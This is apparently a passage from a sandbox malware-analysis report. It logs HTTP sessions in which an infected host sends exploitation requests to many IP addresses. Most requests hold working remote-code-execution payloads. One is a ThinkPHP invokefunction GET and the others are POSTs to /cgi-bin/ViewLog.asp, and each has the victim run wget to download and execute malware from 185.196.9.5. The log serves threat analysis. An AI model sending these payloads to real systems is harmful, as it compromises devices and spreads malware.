2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yd-anhui-huainan-28-112-29-221-7</center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1090	192.168.2.15	50926	112.29.221.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.648305893 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:13.001373053 CET	351	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:05:12 GMT Content-Type: text/html Content-Length: 206 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 32 38 2d 31 31 32 2d 32 39 2d 32 32 31 2d 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yd-anhui-huainan-28-112-29-221-14</center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1091	192.168.2.15	53736	112.51.126.118	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.689157009 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
1092	192.168.2.15	44636	94.26.84.18	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.693434000 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.133131027 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.325982094 CET	257	IN	HTTP/1.0 404 Not Found Date: Sun, 25 Feb 2024 18:05:13 GMT Server: Apache/2.4.56 (Debian) Cache-Control: no-cache, private Connection: close Content-Type: application/json Data Raw: 7b 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 2c 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d Data Ascii: {"success":false,"status":"error","message":"Resource not found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
1093	192.168.2.15	49742	31.136.153.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:12.735591888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:15.748846054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:21.892792940 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:33.924606085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1094	192.168.2.15	44002	95.179.232.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:13.083213091 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.250709057 CET	529	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:05:13 GMT Server: Apache/2.4.46 (Unix) X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'self' Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1095	192.168.2.15	50454	31.136.12.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:13.096235991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.668970108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:14.788837910 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:17.028928041 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:21.636749983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:30.596685886 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1096	192.168.2.15	37806	94.110.134.109	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:13.106340885 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1097	192.168.2.15	38204	85.166.45.127	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:13.137840033 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.360383034 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:05:11 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1098	192.168.2.15	54612	112.31.184.93	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:13.390242100 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:13.740010977 CET	484	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 25 Feb 2024 17:52:39 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://10.0.10.70/40x.html Content-Security-Policy: upgrade-insecure-requests;connect-src * X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1099	192.168.2.15	34514	112.74.191.63	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:14.228074074 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:32.952471018 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Sun, 25 Feb 2024 18:05:14 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1100	192.168.2.15	34102	31.136.120.4	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.046999931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:15.652964115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:16.837016106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:19.333096027 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:24.196932077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:33.668654919 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1101	192.168.2.15	47584	85.14.69.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.055967093 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:15.253303051 CET	30	IN	HTTP/1.1 404 Can't find file

Session ID	Source IP	Source Port	Destination IP	Destination Port
1102	192.168.2.15	49560	95.140.157.4	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:15.071018934 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
